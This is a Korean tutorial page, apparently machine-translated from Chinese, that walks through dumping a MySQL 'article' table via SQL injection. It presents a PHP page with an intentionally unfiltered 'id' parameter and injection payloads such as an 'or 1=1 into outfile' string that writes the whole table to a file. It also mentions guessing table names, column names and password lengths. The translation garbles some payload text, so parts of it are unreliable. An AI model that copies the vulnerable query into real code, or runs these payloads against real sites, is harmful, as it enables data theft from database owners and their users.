> 데이터 베이스 > MySQL 튜토리얼 > SQL 주입 취약점을 사용하여 라이브러리를 드래그하는 사례 공유

SQL 주입 취약점을 사용하여 라이브러리를 드래그하는 사례 공유

零下一度
풀어 주다: 2017-05-17 15:56:39
원래의
8432명이 탐색했습니다.

SQL 인젝션 취약점을 이용한 백엔드 로그인과 SQL 인젝션 취약점을 이용한 라이브러리 드래그는 관련 내용을 학습한 후 요약한 것일 뿐 깊이가 없습니다.

이전 기사와 마찬가지로 데이터 테이블을 생성하고 테스트 목적으로 테이블 안팎에 여러 데이터 조각을 추가해야 합니다.
데이터베이스에 테이블 만들기:

코드는 다음과 같습니다.

CREATE TABLE `article` ( 
`articleid` int(11) NOT 
NULL
 AUTO_INCREMENT, 
`title` varchar(100) CHARACTER 
SET
 utf8 NOT NULL DEFAULT '', 
`content` text CHARACTER SET utf8 NOT NULL, 
PRIMARY 
KEY
 (`articleid`) 
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=latin1;
로그인 후 복사

테이블에 데이터를 삽입하는 코드는 게시하지 않습니다. 다운로드하여 직접 가져올 수 있습니다. 데이터베이스에.
다음으로 사용자 요청을 처리하는 페이지를 작성합니다. 여기서는 사용자가 제출한 데이터를 의도적으로 필터링하지 않고 테스트를 위해 SQL 주입 취약점을 남겨둡니다.
코드는 다음과 같습니다.

코드는 다음과 같습니다.

<?php 
$servername = "localhost"; 
$dbusername = "root"; 
$dbpassword = ""; 
$dbname = "test"; 
$id=$_GET[&#39;id&#39;];//id未经过滤 
$conn=mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败"); 
mysql_select_db($dbname,$conn); 
mysql_query(&#39;set names utf8&#39;); 
$sql = "SELECT * FROM article WHERE articleid=&#39;$id&#39;"; 
$result = mysql_query($sql,$conn); 
$row = mysql_fetch_array($result); 
echo "<p>利用SQL注入漏洞拖库<p>"; 
if (!$row){ 
echo "该记录不存在"; 
exit; 
} 
echo "标题<br>".$row[&#39;title&#39;]."<p>"; 
echo "内容<br>".$row[&#39;content&#39;]."<p>"; 
?>
로그인 후 복사

브라우저에 직접 입력합니다.
127.0.0.1/marcofly/phpstudy/sqlinsert /showart.php?id=1
기사 테이블에서 ID가 1인 레코드에 접근할 수 있습니다
접근 결과는 다음과 같습니다:

다음으로 이 취약점을 사용하겠습니다(취약점을 모르는 경우 도구 + 수동 탐지를 통해서만 탐지 가능). 기사 표를 다운로드하는 방법을 보여드리겠습니다.
주소 표시줄에 'to outfile 'e:/sql.txt'%23을 입력하세요.
분석: %23은 #의 ASCII 코드입니다. 주소 표시줄이 비어 있으면 주소 표시줄에 %23을 입력하면 #이 되고 다음 SQL 문을 코멘트로 출력합니다.
실행 후 E드라이브를 열어서 sql.txt 파일을 추가로 찾으시면 테이블 글에 기록이 있습니다.
왜 기록이 하나뿐인가요? 이 데이터 테이블에는 레코드가 하나만 있습니까? ID가 1인 하나의 레코드만 검색하기 때문에 그렇지 않습니다. 그러면 기사 테이블의 모든 레코드를 한 번에 다운로드할 수 있습니까?
구성된 SQL 문이 충분히 유연하다면 대답은 '예'입니다(구성된 SQL 문의 유연성이 다시 향상됩니다).
분석 결과, URL 주소 표시줄에 'into outfile 'e:/sql.txt'%23을 입력하면 sql 쿼리문으로 병합되어 다음과 같이 됩니다.
SELECT * FROM Article WHERE articleid='5 ' into outfile 'e:/whf.txt'#'
주의 깊게 분석한 후 다음과 같은 SQL 문을 구성할 수 있습니다.
SELECT * FROM Article WHERE Articleid='' or 1=1 into outfile 'e: /whf.txt'#'
이 경우 WHERE 절 은 무슨 일이 있어도 항상 true입니다. 즉, sql 문은 다음과 같습니다.
SELECT * FROM 기사. into outfile 'e:/whf.txt'#'
이해하세요. sql 문은 먼저 select 문을 실행하여 테이블 Article의 모든 내용을 검색한 다음 outfile 'e:/whf.txt'로 실행합니다. # '컨텐츠를 내보냅니다.
믿지 못하겠다면 실행하면 되는데...
SQL 인젝션 취약점을 이용하면 당연히 테이블명, 컬럼명, 사용자 비밀번호 길이(LEFT 함수) 등을 추측할 수 있다. 위의 데모를 직접 따를 수 있습니다. 테이블의 모든 데이터를 내보내면 테이블 이름, 열 이름 등을 추측할 필요가 없습니다.
좀 피곤해서 여기까지만 쓰겠습니다.
SQL 인젝션 취약점을 이용한 백엔드 로그인과 SQL 인젝션 취약점을 이용한 라이브러리 드래그는 관련 내용을 익힌 후 요약한 내용입니다. 그리고 다른 의미는 없습니다.

【관련 추천】

1. 특별 추천: "php Programmer Toolbox" V0.1 버전 다운로드

2. SQL 인젝션을 방지하려면? SQL 인젝션 예방 방법 5가지 소개

3. 유명한 SQL 인젝션 취약점 검사 도구 5가지 공유

4. SQL 인젝션 인스턴스 프로세스 공유

위 내용은 SQL 주입 취약점을 사용하여 라이브러리를 드래그하는 사례 공유의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

관련 라벨:
원천:php.cn
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿